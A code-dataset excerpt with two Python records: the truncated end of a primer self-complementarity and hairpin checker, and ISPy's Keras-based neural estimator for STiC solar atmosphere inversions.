try:\n equG.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'C'):\n try:\n equC.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'M'):\n try:\n equA.index(c2)\n return True\n except ValueError:\n try:\n equC.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'R'):\n try:\n equA.index(c2)\n return True\n except ValueError:\n try:\n equG.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'W'):\n try:\n equA.index(c2)\n return True\n except ValueError:\n try:\n equT.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'S'):\n try:\n equG.index(c2)\n return True\n except ValueError:\n try:\n equC.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'Y'):\n try:\n equT.index(c2)\n return True\n except ValueError:\n try:\n equC.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'K'):\n try:\n equT.index(c2)\n return True\n except ValueError:\n try:\n equG.index(c2)\n return True\n except ValueError:\n return False\n\n if (c1 == 'V'):\n try:\n equA.index(c2)\n return True\n except ValueError:\n try:\n equG.index(c2)\n return True\n except ValueError:\n try:\n equC.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'H'):\n try:\n equA.index(c2)\n return True\n except ValueError:\n try:\n equT.index(c2)\n return True\n except ValueError:\n try:\n equC.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'D'):\n try:\n equA.index(c2)\n return True\n except ValueError:\n try:\n equT.index(c2)\n return True\n except ValueError:\n try:\n equG.index(c2)\n return True\n except ValueError:\n return False\n if (c1 == 'B'):\n try:\n equT.index(c2)\n return True\n except ValueError:\n try:\n equG.index(c2)\n return True\n except ValueError:\n try:\n equC.index(c2)\n return True\n except ValueError:\n return False\n return False\n\n\n# // return string containing all hairpins\ndef displayHairpin(theHairpinArray, theSequence):\n returnString = \"\"\n # s1 = \"\"\n # d = len(theSequence)\n # i, j = 0, 0\n theHairpinArrayLength = len(theHairpinArray)\n # Potential hairpin formation: \"\n returnString = returnString + \"Number of harpins: \"\n if (theHairpinArrayLength > 0):\n if (theHairpinArrayLength > 1):\n if (theHairpinArray[theHairpinArrayLength - 1][1] == theHairpinArray[theHairpinArrayLength - 2][1] and (theHairpinArray[theHairpinArrayLength - 1][2] == theHairpinArray[theHairpinArrayLength - 2][2])):\n theHairpinArrayLength = theHairpinArrayLength - 1\n # // get rid of the last one\n # for i in range(theHairpinArrayLength):\n # # // add a bar between 2 legs of the hairpin if bases in the 2nd leg is contiguous to the 1st leg\n # # // substring wants a value from the start location to 1+the end location\n # s1 = theSequence.substring(0, theHairpinArray[i][0]) +\n # theSequence.substring(theHairpinArray[i][0], theHairpinArray[i][1] + 1).fontcolor(\"red\") +\n # ((theHairpinArray[i][1] + 1 >= theHairpinArray[i][2]) ? \"-\": \"\") +\n # theSequence.substring(theHairpinArray[i][1] + 1, theHairpinArray[i][2]) +\n # theSequence.substring(theHairpinArray[i][2], theHairpinArray[i][3] + 1).fontcolor(\"red\") +\n # theSequence.substring(theHairpinArray[i][3] + 1, d)\n # returnString = returnString + \"5' \" + s1 + \" 3'
    \"\n\n returnString += str(theHairpinArrayLength)\n # returnString = returnString + \"
    \"\n else:\n returnString += \" 0\"\n\n return returnString\n\n\ndef display3EndDimer(theOligo, theAlignedArray):\n d = len(theOligo.Sequence)\n returnString = \"\"\n # s1 = \"\"\n # s2 = \"\"\n # // 3' complementarity\n returnString += \"3' Complementarity: \"\n N = 0\n\n for n in range(len(theAlignedArray)):\n # // end position of match in original seq\n if (theAlignedArray[n][2] == d - 1):\n N += 1\n\n returnString += f\"{N}\"\n return returnString\n\n\n# // all possible dimerization sites\ndef displayAllDimers(theAlignedArray, theSequence, reversedSeq):\n # / * theAlignedArray is a bit strange in the second dimension. Assume it is a length 5 array called 'theResults'\n # theResults[0] == start index\n # theResults[1] == start matching index in reverse complement seq\n # theResults[2] == end index of aligned bases(inclusive)\n # theResults[3] == end matching index in reverse complement Seq\n # theResults[4] == number of mismatches\n # * /\n # d = len(theSequence)\n returnString = \"\"\n # s1 = \"\"\n # s2 = \"\"\n # maxoffset = 0\n # offset, j, n = None, None, None\n # offsetStr, maxoffsetStr = None, None\n # // all other possible alignment sites\n returnString += \"All potential self-annealing sites are marked in red (allowing 1 mis-match): \"\n if (len(theAlignedArray) > 1):\n returnString += str(len(theAlignedArray))\n else:\n returnString += \"0\"\n\n # returnString += \"\\n\"\n return returnString\n\n\ndef reverseString(string):\n return string[::-1]\n\n\ndef stringToArray(string):\n return list(string)\n\n\ndef calcPrimer(form):\n # theStart = None\n # theEnd = None\n # calcStart = datetime.now()\n\n if (len(form.oligoBox) < 8):\n raise ValueError(\n \"Please enter at least 8 bases before checking for self-complementarity!\")\n\n theOligo, theComplement = Start(form)\n\n if (theOligo.seqArray):\n del theOligo.seqArray\n if (theOligo.revSeqArray):\n del theOligo.revSeqArray\n if (theComplement.seqArray):\n del theComplement.seqArray\n if (theComplement.revSeqArray):\n del theComplement.revSeqArray\n\n theOligo.revSequence = reverseString(theOligo.Sequence)\n theComplement.revSequence = reverseString(theComplement.Sequence)\n\n theOligo.seqArray = stringToArray(theOligo.Sequence)\n theOligo.revSeqArray = stringToArray(theOligo.revSequence)\n theComplement.seqArray = stringToArray(theComplement.Sequence)\n theComplement.revSeqArray = stringToArray(theComplement.revSequence)\n\n # // change if removing the hairpin selection options\n\n global minAlignLen\n global minHairpinLen\n\n minAlignLen = int(form.selfComp) # // for 3' complementarity\n minHairpinLen = int(form.hairpin) # // for hairpin\n\n # // minAlignLen = parseInt(form.selfComp.value)\n # // minHairpinLen = parseInt(form.hairpin.value)\n global broadMatch\n broadMatch = False\n # // True: do all degenerate comparisons\n # // now create window\n # primerWin = window.open(\n # \"\", 'primer', 'width=700,toolbar=0,location=0,directories=0,status=1,menuBar=1,scrollBars=1,resizable=1')\n # // primerWin.document.open(\"text/html\")\n # print(\n # \"Oligo Self Complementarity Check<\\/TITLE><\\/HEAD>\")\n # primerWin.document.write('<STYLE type=\"text\\/css\">')\n # primerWin.document.write('<!--')\n # if (isMac and browserVersion < 5.0) {\n # primerWin.document.write(MacStyleSheet)\n # } else {\n # primerWin.document.write(PCStyleSheet)\n # }\n # primerWin.document.write('-->')\n # primerWin.document.write('<\\/STYLE>')\n # print(\"<BODY BGCOLOR=white>\")\n # print(\n # \"Minimum base pairs required for single primer self-dimerization: \" + minAlignLen + \".<BR>\")\n # print(\n # \"Minimum base pairs required for a hairpin: \" + minHairpinLen + \".<BR>\")\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calcPrimer - initialize window took \" + (theEnd - calcStart) + \" ms<br>\")\n calculateMatrices(theOligo, theComplement)\n # // do this after the window is in place so we can print diagnostics if necessary\n # anchorString = \"\"\n # print(anchorString.anchor(\"strictMatches\"))\n # if (theOligo.hasIUpacBase) {\n # print(\"Your oligo contains degenerate bases.<BR>\")\n # print(\n # \"The strictMatch section displays only <font COLOR='RED'>perfect matches <\\/FONT>in the case of degenerate bases.<BR>\")\n # print(\n # \"For Example:<BR> <PRE> 'N' matches only with 'N';<BR> 'R' matches only with 'S';<BR> 'W' matches only with 'W'; etc.<\\/PRE><P>\")\n # hrefString = \"view all matches.\"\n # print(\n # \"Scroll down to view <font COLOR='GREEN'><a href='#allMatches'>all Matches<\\/a><\\/FONT>\")\n # }\n print(displayHairpin(theHairpinArray, theOligo.Sequence), end='\\t')\n\n # if (!isCompatible) {\n # print(\n # \"<p><b>Sorry, the hairpin loop calculation is only available if you are using Netscape or IE 4.0 or higher!\\n<\\/B><br>\")\n # } else {\n # theStart = datetime.now()\n # print(displayHairpin(\n # theHairpinArray, theOligo.Sequence))\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calcPrimer - displayHairpin took \" + (theEnd - theStart) + \" ms<br>\")\n # }\n # theStart = datetime.now()\n\n print(display3EndDimer(theOligo, theAlignedArray), end='\\t')\n\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calcPrimer - display3EndDimer took \" + (theEnd - theStart) + \" ms<br>\")\n # theStart = datetime.now()\n print(displayAllDimers(theAlignedArray, theOligo.Sequence, theOligo.revSequence))\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calcPrimer - displayAllDimers took \" + (theEnd - theStart) + \" ms<br>\")\n # theStart = datetime.now()\n if (theOligo.hasIUpacBase):\n calcDegeneratePrimers(theOligo, theComplement)\n # theEnd = datetime.now()\n # if (doTiming) primerWin.document.write(\"calcPrimer - all calls to close took \" + (theEnd - calcStart) + \" ms<br>\")\n # print(\"<\\/BODY><\\/HTML>\")\n # primerWin.document.close()\n # primerWin.focus()\n # return False\n\n\nif __name__ == \"__main__\":\n sequence = argv[1]\n form = Input(oligoBox=sequence)\n if len(argv) == 3:\n form.selfComp = int(argv[2])\n form.hairpin = int(argv[3])\n else:\n form.selfComp = 3\n form.hairpin = 3\n calcPrimer(form)\n","sub_path":"bin/OligoCalcCompare.py","file_name":"OligoCalcCompare.py","file_ext":"py","file_size_in_byte":29909,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"436730766","text":"import copy\nimport numpy as np\nimport os\nimport random\nimport sys\nimport time\nimport warnings\nfrom contextlib import redirect_stdout\nimport ipdb\n\nwith warnings.catch_warnings():\n warnings.filterwarnings(\"ignore\", category=FutureWarning)\n# To deactivate warnings: https://github.com/tensorflow/tensorflow/issues/7778\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '2'\n\n\n# No more available\n# import keras.backend.tensorflow_backend as ktf\nfrom keras.callbacks import Callback, ModelCheckpoint\nfrom keras.layers import Input, Conv2D, add, Activation\nfrom keras.layers import Lambda\nfrom keras.layers.advanced_activations import ELU\nfrom keras.layers.merge import concatenate\nfrom keras.models import Model\n\n# https://github.com/tensorflow/tensorflow/issues/23728\n# from keras.optimizers import Adam\nfrom tensorflow.keras.optimizers import Adam\n\nfrom keras.regularizers import l2\nfrom keras.utils.data_utils import Sequence\n\nimport sparsetools as sp\nfrom ISPy.util import gentools\n\n\n# ==================================================================================\nclass DataGenerator(Sequence):\n \"\"\"Generates data for training a neural network from a STiC model \n\n :Authors: \n Carlos Diaz (ISP/SU 2020)\n \"\"\"\n\n def __init__(self, datasize, dx, batch_size, logtau, stokelist, cubelist, noise):\n 'Initialization'\n self.n_training_orig = datasize\n self.batch_size = batch_size\n self.dx = dx\n self.noise = noise # CHECK THAT IM USING NOISE!\n self.logtau = logtau\n self.stokelist = np.array(stokelist)\n self.cubelist = np.array(cubelist)\n self.batchs_per_epoch_training = int(self.n_training_orig / self.batch_size)\n self.n_training = self.batchs_per_epoch_training * self.batch_size\n\n def __getitem__(self, index):\n 'Generate one batch of data'\n input_train_get, output_train_get = self.__data_generation(self)\n return input_train_get, output_train_get\n\n def __len__(self):\n 'Denotes the number of batches per epoch'\n return self.batchs_per_epoch_training\n\n def __data_generation(self, list_IDs_temp):\n 'Generates data containing batch_size samples'\n\n stokes = self.stokelist[0, :]\n cube = self.cubelist[0, :]\n nl, ny, nx = stokes.shape\n ntau, ny, nx = cube.shape\n Lx = nx\n Ly = ny\n dx = self.dx\n\n # Regularization\n jitterOption = True\n mulitplyJitter = 2\n mynoisecube = 1e-2\n\n input_train = np.zeros((self.batch_size, dx, dx, int(nl)))\n output_train = np.zeros((self.batch_size, dx, dx, int(ntau)))\n for j in range(self.batch_size):\n randi = random.randint(0, self.stokelist.shape[0] - 1)\n stokes = self.stokelist[randi, :]\n\n xpos = random.randint(0, Lx - dx)\n ypos = random.randint(0, Ly - dx)\n rota = random.randint(0, 3)\n\n ni = len(self.logtau)\n ministokes = stokes[:,ypos:ypos + dx, xpos:xpos + dx] \n\n lenq = cube.shape[0]\n minicube = np.zeros((lenq, ministokes.shape[1], ministokes.shape[2]))\n\n for iq in range(lenq):\n jitterX = random.randint(-1 * mulitplyJitter, +1 * mulitplyJitter)\n jitterY = random.randint(-1 * mulitplyJitter, +1 * mulitplyJitter)\n if jitterOption is False:\n jitterY, jitterX = 0, 0\n\n import scipy.ndimage as nd\n minicube[iq, :, :] = nd.shift(cube[iq, ypos:ypos + dx, xpos:xpos + dx],\n (jitterY, jitterX), mode='nearest')\n\n # Extra noise\n minicube = minicube[:] + minicube * np.random.normal(0., mynoisecube,(cube.shape[0], dx, dx))\n ministokes = ministokes[:] + np.random.normal(0.,self.noise,(stokes.shape[0],dx,dx))\n\n from ISPy.util.azimuth import BTAZI2BQBU_cube\n minicube[ni * 4:5 * ni, :, :], minicube[ni * 5:6 * ni, :, :] = BTAZI2BQBU_cube(\n minicube[ni * 4:5 * ni, :, :], minicube[ni * 5:6 * ni, :, :])\n\n input_train[j, :, :, :] = gentools.rotate_cube(np.swapaxes(ministokes, 0, 2), rota)\n output_train[j, :, :, :] = gentools.rotate_cube(np.swapaxes(minicube, 0, 2), rota)\n\n return input_train, output_train\n\n\n\n\n# ==================================================================================\ndef network1D(nx, ny, nd, nq, activation='relu', n_filters=64, l2_reg=1e-7):\n \"\"\" Neural network architecture \n \n :Authors: \n Carlos Diaz (ISP/SU 2020)\n\n \"\"\"\n\n def minires(inputs, n_filters, kernel=1):\n x = Conv2D(int(n_filters), (kernel, kernel), padding='valid',\n kernel_initializer='he_normal', kernel_regularizer=l2(l2_reg))(inputs)\n x = ELU(alpha=1.0)(x)\n x = Conv2D(n_filters, (kernel, kernel), padding='valid',\n kernel_initializer='he_normal', kernel_regularizer=l2(l2_reg))(x)\n return x\n\n def myblock(inputs, n_filters, kernel=1):\n x = Conv2D(n_filters, (kernel, kernel), padding='valid',\n kernel_initializer='he_normal', kernel_regularizer=l2(l2_reg))(inputs)\n xo = ELU(alpha=1.0)(x)\n x = Conv2D(n_filters, (kernel, kernel), padding='valid',\n kernel_initializer='he_normal', kernel_regularizer=l2(l2_reg))(xo)\n x = ELU(alpha=1.0)(x)\n x = add([x, xo])\n return x\n\n inputs = Input(shape=(nx, ny, nd)) # depth goes last in TensorFlow\n nd4 = int(nd/4)\n\n # TEMP\n x1 = myblock(inputs, n_filters)\n x1 = minires(x1, int(nq / 6))\n # x1 = Activation('elu')(x1) \n x1 = Lambda(lambda x: x + 5.0)(x1)\n\n # VLOS\n x2 = myblock(inputs, n_filters)\n x2 = minires(x2, int(nq / 6))\n\n # VTURB\n x3 = myblock(inputs, n_filters)\n x3 = minires(x3, int(nq / 6))\n # x3 = Activation('relu')(x3)\n\n # BLONG\n xV = Lambda(lambda x: concatenate([x[:,:,:, 0:nd4], x[:,:,:, 1*nd4:2*nd4], \n x[:,:,:, 2*nd4:3*nd4], 100*x[:,:,:, 3*nd4:]]) )(inputs)\n x4 = myblock(xV, n_filters)\n x4 = minires(x4, int(nq / 6))\n\n # BHOR - BQ\n xQ = Lambda(lambda x: concatenate([x[:,:,:, 0:nd4], 100*x[:,:,:, 1*nd4:2*nd4], \n x[:,:,:, 2*nd4:3*nd4], x[:,:,:, 3*nd4:]]) )(inputs)\n x5 = myblock(xQ, n_filters)\n x5 = minires(x5, int(nq / 6))\n\n # BHOR - BU\n xU = Lambda(lambda x: concatenate([x[:,:,:, 0:nd4], x[:,:,:, 1*nd4:2*nd4], \n 100*x[:,:,:, 2*nd4:3*nd4], x[:,:,:, 3*nd4:]]) )(inputs)\n x6 = myblock(xU, n_filters)\n x6 = minires(x6, int(nq / 6))\n\n final = concatenate([x1, x2, x3, x4, x5, x6])\n return Model(inputs=inputs, outputs=final)\n\n\n# ==================================================================================\nclass deep_network(object):\n \"\"\"Deep neural network class: it defines the network, load the weigths, does the \n training and the predictions. \n\n :Authors: \n Carlos Diaz (ISP/SU 2020)\n\n \"\"\"\n def __init__(self, root, logtau, nl):\n self.root = root\n self.nl = nl\n self.logtau = logtau\n self.ntau = len(self.logtau) * 6\n self.dx = 20\n self.nx, self.ny = self.dx, self.dx\n self.nworker = 16\n\n def define_network(self):\n print(\"[INFO] Setting up network from scratch\")\n self.model = network1D(self.nx, self.ny, int(self.nl), int(self.ntau))\n\n def read_network(self):\n print(\"[INFO] Setting up network and loading weights {0}_weights.hdf5\".format(self.root))\n self.model = network1D(self.nx, self.ny, int(self.nl), int(self.ntau))\n self.model.load_weights(\"{0}_weights.hdf5\".format(self.root))\n\n def train(self, n_iterations, stokelist, cubelist, extranoise, learning_rate, batch_size,\n datasize):\n self.n_training_orig = datasize\n self.batch_size = batch_size\n self.n_validation_orig = int(batch_size)\n self.lr = learning_rate\n self.noise = extranoise\n self.batchs_per_epoch_training = int(self.n_training_orig / self.batch_size)\n self.batchs_per_epoch_validation = int(self.n_validation_orig / self.batch_size)\n self.n_training = self.batchs_per_epoch_training * self.batch_size\n self.n_validation = self.batchs_per_epoch_validation * self.batch_size\n\n self.model.compile(loss='mean_absolute_error', optimizer=Adam(lr=self.lr))\n print(\"[INFO] Training network during {} epochs:\".format(n_iterations))\n losses = []\n self.checkpointer = ModelCheckpoint(filepath=\"{0}_weights.hdf5\".format(self.root),\n verbose=2, save_best_only=False)\n\n # Generators\n training_generator_class = DataGenerator(self.n_training_orig, self.dx, self.batch_size,\n self.logtau, stokelist, cubelist, self.noise)\n validation_generator_class = DataGenerator(self.n_validation_orig, self.dx, self.batch_size,\n self.logtau, stokelist, cubelist, self.noise)\n \n self.metrics = self.model.fit_generator(training_generator_class,\n self.batchs_per_epoch_training, epochs=n_iterations,\n callbacks=[self.checkpointer],\n validation_data=validation_generator_class,\n validation_steps=self.batchs_per_epoch_validation,\n use_multiprocessing=True, workers=self.nworker)\n\n def read_and_predict(self, inputdata):\n print(\"[INFO] Setting up network for predictions\")\n\n # print(inputdata.shape)\n self.nx = inputdata.shape[3]\n self.ny = inputdata.shape[2]\n self.nl = inputdata.shape[1]\n self.ntau = len(self.logtau) * 6\n\n self.model = network1D(self.nx, self.ny, int(self.nl), int(self.ntau))\n print(\"[INFO] Loading network weights: {0}_weights.hdf5\".format(self.root))\n self.model.load_weights(\"{0}_weights.hdf5\".format(self.root))\n\n input_validation = np.zeros((1, self.nx, self.ny, self.nl), dtype='float32')\n input_validation[0, :, :, :] = inputdata.T[:, :, :, 0]\n\n start = time.time()\n out = self.model.predict(input_validation)\n end = time.time()\n print(\"[INFO] Prediction took: {0:3.2} seconds\".format(end - start))\n\n print(\"[INFO] Azimuth inverse transformation\")\n from ISPy.util.azimuth import BQBU2BTAZI_cube\n # Inverse transformation\n out = np.reshape(out, (input_validation.shape[0], self.nx, self.ny, 6, 9))\n out[0, :, :, 4, :], out[0, :, :, 5, :] = BQBU2BTAZI_cube(out[0, :, :, 4, :], out[0, :, :, 5, :])\n out = np.reshape(out, (input_validation.shape[0], self.nx, self.ny, 54))\n\n return out\n\n\n# ==================================================================================\nclass neural_estimator(object):\n \"\"\"Creates a small neural network that can be trained with STiC results\n to perform faster inversions on new data. Note: data index np.where(o.weights[:, 0] < 1.0)[0]\n\n\n Example\n -------\n >>> from ISPy.util import neural_estimation as nst\n >>> import sparsetools as sp\n\n # Reading data in STiC format:\n >>> model_train_list = ['model.nc']\n >>> stokes_train_list = ['profiles.nc']\n >>> logtau = [-7,-6,-5,-4,-3,-2,-1, 0, 1]\n\n # Initializing the neural network\n >>> myestimator = nst.neural_estimator()\n >>> myestimator.train(name='network1',option='start',nepochs=40,model_train_list,stokes_train_list,logtau)\n >>> myestimator.quickplot(filename ='testplot.pdf')\n\n >>> dataprediction = 'newprofiles.nc'\n >>> original_logtau = sp.model(model_train_list[0],0,0,0).ltau[0,0,0,:]\n >>> myestimator.predict(name='network1',dataprediction,logtau,original_logtau,\"model_output.nc\")\n \n :Authors: \n Carlos Diaz (ISP/SU 2020)\n\n \"\"\"\n def __init__(self):\n # self.name = name\n self.init = 0\n self.num_params = 6\n self.logtau = 0\n self.nl = None\n\n def predict(self, name, inputdata, logtau, original_logtau, nameoutput='model_neuralnetwork.nc', pgastop = 1.0):\n \"\"\"It uses a pre-trained neural network with new observed data\n\n Parameters\n ----------\n name : str, optional\n name of the network, by default 'network1'\n inputdata : ncfile\n input file in STiC format\n logtau : list\n logtau scale used to train the network\n original_logtau : list\n Final stratification of the model to do the interpolation\n nameoutput : str, optional\n name of the output model, by default 'model_neuralnetwork.nc'\n\n Example\n -------\n >>> dataprediction = 'newprofiles.nc'\n >>> original_logtau = sp.model(model_train_list[0],0,0,0).ltau[0,0,0,:]\n >>> myestimator.prediction(name='network1',dataprediction,logtau,original_logtau,\"model_output.nc\")\n \n \"\"\"\n\n print('[INFO] Sending the data to the network')\n o = sp.profile(inputdata)\n idx = np.where(o.weights[:, 0] < 1.0)[0]\n stokelist = np.array([np.concatenate([o.dat[0, :, :, idx, 0], 1e0 * o.dat[0, :, :, idx, 1],\n 1e0 * o.dat[0, :, :, idx, 2],\n 1e0 * o.dat[0, :, :, idx, 3]])])\n print(stokelist.shape,'...')\n self.nl = stokelist.shape[1]\n self.deepl = deep_network(name, logtau, self.nl)\n prediction = self.deepl.read_and_predict(stokelist)\n nx, ny, dum = prediction[0, :, :, :].shape\n prediction = np.reshape(prediction[0, :, :, :], (nx, ny, 6, len(logtau)))\n noriginaltau = len(original_logtau)\n\n # Fill the model with the prediction\n print('[INFO] Writing in STiC format')\n m = sp.model(nx=nx, ny=ny, nt=1, ndep=noriginaltau)\n from tqdm import tqdm\n for ix in tqdm(range(nx)):\n for iy in range(ny):\n temp = np.interp(original_logtau, logtau, np.abs(prediction[ix, iy, 0, :]))\n vlos = np.interp(original_logtau, logtau, prediction[ix, iy, 1, :])\n vturb = np.interp(original_logtau, logtau, np.abs(prediction[ix, iy, 2, :]))\n Bln = np.interp(original_logtau, logtau, prediction[ix, iy, 3, :])\n Bho = np.interp(original_logtau, logtau, np.abs(prediction[ix, iy, 4, :]))\n Bazi = np.interp(original_logtau, logtau, prediction[ix, iy, 5, :])\n\n m.ltau[0, iy, ix, :] = original_logtau\n m.temp[0, iy, ix, :] = temp * 1e3\n m.vlos[0, iy, ix, :] = vlos * 1e5\n m.pgas[0, iy, ix, :] = pgastop\n m.vturb[0, iy, ix, :] = vturb * 1e5\n m.Bln[0, iy, ix, :] = Bln * 1e3\n m.Bho[0, iy, ix, :] = Bho * 1e3\n m.azi[0, iy, ix, :] = Bazi\n\n # Write the model\n m.write(nameoutput)\n\n def create_dataset(self, model_train_list, stokes_train_list, logtau_train_list):\n \"\"\"Creates a dataset for training\n\n Parameters\n ----------\n model_train_list : list of strings\n List of models in STiC format used for training\n stokes_train_list : list of strings\n List of observed or synthetic profiles for training\n logtau_train_list : list\n List of logtau values included in the training\n\n \"\"\"\n self.logtau = np.array(logtau_train_list)\n\n stokelist, cubelist = [], []\n for simu in range(len(model_train_list)):\n m = sp.model(model_train_list[simu])\n s = sp.profile(stokes_train_list[simu])\n idx = np.where(s.weights[:, 0] < 1.0)[0]\n indices = sorted(gentools.findindex(self.logtau, m.ltau[0, 0, 0, :]))\n ni = len(indices)\n\n # Physical parameters\n supercube = np.zeros((ni * self.num_params, m.temp.shape[1], m.temp.shape[2]))\n supercube[:ni] = m.temp[0, :, :, indices] / 1e3\n supercube[ni:2 * ni] = m.vlos[0, :, :, indices] / 1e5\n supercube[ni * 2:3 * ni] = m.vturb[0, :, :, indices] / 1e5\n supercube[ni * 3:4 * ni] = m.Bln[0, :, :, indices] / 1e3\n supercube[ni * 4:5 * ni] = m.Bho[0, :, :, indices] / 1e3\n supercube[ni * 5:6 * ni] = m.azi[0, :, :, indices]\n\n # Stokes parameters\n stokes = np.concatenate([s.dat[0, :, :, idx, 0], 1e0 * s.dat[0, :, :, idx, 1],\n 1e0 * s.dat[0, :, :, idx, 2], 1e0 * s.dat[0, :, :, idx, 3]])\n\n stokelist.append(stokes)\n cubelist.append(supercube)\n\n self.cubelist = cubelist\n self.stokelist = stokelist\n self.nl = len(stokes)\n\n \n def prepare_training(self, name='network1', option='start', nepochs=20, extranoise=5e-4,\n learning_rate=1e-4, batch_size=100, datasize=10, samplesize=20):\n \"\"\"It defines the network and start the training.\n\n Parameters\n ----------\n name : str, optional\n name of the network, by default 'network1'\n option : str, optional\n start or continue the previous training, by default 'start'\n nepochs : int, optional\n Number of epochs, by default 20\n extranoise : [type], optional\n Extra noise level in Stokes profiles, by default 5e-4\n learning_rate : [type], optional\n Learning rate used in Adam optimizer, by default 1e-4\n batch_size : int, optional\n Size of each batch, by default 100\n datasize : int, optional\n Size of the dataset created for training, by default 10\n samplesize : int, optional\n Size of each FOV created for training, by default 20\n \n \n \"\"\"\n\n self.name = name\n self.option = option # [start] or [continue]\n self.nepochs = nepochs\n self.extranoise = extranoise\n self.learning_rate = learning_rate\n self.batch_size = batch_size\n self.samplesize = samplesize\n self.datasize = datasize*batch_size\n\n if self.logtau is None: print('Variable logtau scale should be define')\n if self.cubelist is None: print('Data to train should be given')\n if self.stokelist is None: print('Data to train should be given')\n\n self.deepl = deep_network(self.name, self.logtau, self.nl)\n\n if self.option == 'start':\n self.deepl.define_network()\n self.deepl.train(self.nepochs, self.stokelist, self.cubelist, self.extranoise,\n self.learning_rate, self.batch_size, self.datasize)\n\n elif self.option == 'continue':\n self.deepl.read_network()\n self.deepl.train(self.nepochs, self.stokelist, self.cubelist, self.extranoise,\n self.learning_rate, self.batch_size, self.datasize)\n\n else:\n print('Keyword \"option\" should be \"start\" or \"continue\"')\n\n\n def train(self, name='network1', option='start', nepochs=20, model_train_list=None, stokes_train_list=None,\n logtau_train_list=None, extranoise=6e-4, learning_rate=1e-4, batch_size=100, datasize=100, samplesize=20):\n \"\"\"Train the neural network\n\n Parameters\n ----------\n name : str, optional\n name of the network, by default 'network1'\n option : str, optional\n start or continue the previous training, by default 'start'\n nepochs : int, optional\n Number of epochs, by default 20\n model_train_list : list of strings\n List of models in STiC format used for training\n stokes_train_list : list of strings\n List of observed or synthetic profiles for training\n logtau_train_list : list\n List of logtau values included in the training\n extranoise : [type], optional\n Extra noise level in Stokes profiles, by default 5e-4\n learning_rate : [type], optional\n Learning rate used in Adam optimizer, by default 1e-4\n batch_size : int, optional\n Size of each batch, by default 100\n datasize : int, optional\n Size of the dataset created for training, by default 10\n samplesize : int, optional\n Size of each FOV created for training, by default 20\n \n Example\n -------\n # Reading data in STiC format:\n >>> model_train_list = ['model.nc']\n >>> stokes_train_list = ['profiles.nc']\n >>> logtau = [-7,-6,-5,-4,-3,-2,-1, 0, 1]\n\n # Initializing the neural network\n >>> myestimator = nst.neural_estimator()\n >>> myestimator.train(name='network1',option='start',nepochs=10,model_train_list,stokes_train_list,logtau)\n >>> myestimator.quickplot()\n\n \"\"\"\n\n\n self.create_dataset(model_train_list, stokes_train_list, logtau_train_list)\n self.prepare_training(name, option, nepochs, extranoise, learning_rate, batch_size, datasize, samplesize)\n\n\n\n def quickplot(self,indexlist=[3,7],filename ='testplot.pdf'):\n \"\"\"Quick figure with the comparison between the training dataset and\n the prediction of the network.\n\n Parameters\n ----------\n indexlist : list, optional\n List of logtau to plot, by default [3,7]\n \"\"\"\n print('[INFO] Running quick plot')\n import matplotlib.pyplot as plt\n from ISPy.util.plottools import phimap, add_colorbar\n\n stokelist = np.array(self.stokelist)[0:1,:]\n prediction = self.deepl.read_and_predict(stokelist)\n nx, ny, dum = prediction[0, :, :, :].shape\n\n # Prediction\n prediction = np.reshape(prediction[0, :, :, :], (nx, ny, 6, len(self.logtau)))\n cubelist = np.array(self.cubelist).T[:,:,:,0]\n cubelist = np.reshape(cubelist, (nx,ny,6,9))\n newtau = self.logtau[:]\n\n\n listnvari = [0,2,1,3,4,5]\n cmapvari = ['magma', 'viridis', 'seismic', 'RdGy', 'PRGn', phimap]\n phylabel = ['Temp', r'$v_{turb}$',r'$v_{los}$',r'$B_{long}$',r'$B_{perp}$',r'Azi']\n limitsmax = [8.,7.,+5,+5,+10,+10,+1,+1,+1,+1,np.pi,np.pi]\n limitsmin = [4.5,5,-0,-0,-10,-10,-1,-1,-1,-1,0,0]\n normalizecte = [1.0,1.0,1.0,1.0,1.0,np.pi/180.]\n\n fig, axs = plt.subplots(figsize=(9,10), nrows=len(listnvari), ncols=4, sharex=True, sharey=True)\n for ii in range(len(listnvari)):\n ii2 = int(ii*2)\n ii21 = ii2 + 1\n\n indiplot = indexlist[0]\n axs[ii,0].set_title(r'NN - '+phylabel[ii]+r' log$\\tau$={}'.format(newtau[indiplot]))\n axs[ii,0].imshow(prediction[:,:,listnvari[ii],indiplot].T*normalizecte[ii],cmap=cmapvari[ii],\n origin='lower',vmin=limitsmin[ii2],vmax=limitsmax[ii2])\n axs[ii,1].set_title(r'STiC - '+phylabel[ii]+r' log$\\tau$={}'.format(newtau[indiplot]))\n im = axs[ii,1].imshow(cubelist[:,:,listnvari[ii],indiplot].T,cmap=cmapvari[ii],\n origin='lower',vmin=limitsmin[ii2],vmax=limitsmax[ii2])\n cb = add_colorbar(im, aspect=30)\n\n indiplot = indexlist[1]\n axs[ii,2].set_title(r'NN - '+phylabel[ii]+r' log$\\tau$={}'.format(newtau[indiplot]))\n axs[ii,2].imshow(prediction[:,:,listnvari[ii],indiplot].T*normalizecte[ii],cmap=cmapvari[ii],\n origin='lower',vmin=limitsmin[ii21],vmax=limitsmax[ii21])\n axs[ii,3].set_title(r'STiC - '+phylabel[ii]+r' log$\\tau$={}'.format(newtau[indiplot]))\n im = axs[ii,3].imshow(cubelist[:,:,listnvari[ii],indiplot].T,cmap=cmapvari[ii],\n origin='lower',vmin=limitsmin[ii21],vmax=limitsmax[ii21])\n cb = add_colorbar(im, aspect=30)\n\n plt.tight_layout()\n plt.savefig(filename, bbox_inches='tight')\n","sub_path":"ISPy/util/neural_estimation.py","file_name":"neural_estimation.py","file_ext":"py","file_size_in_byte":24065,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} 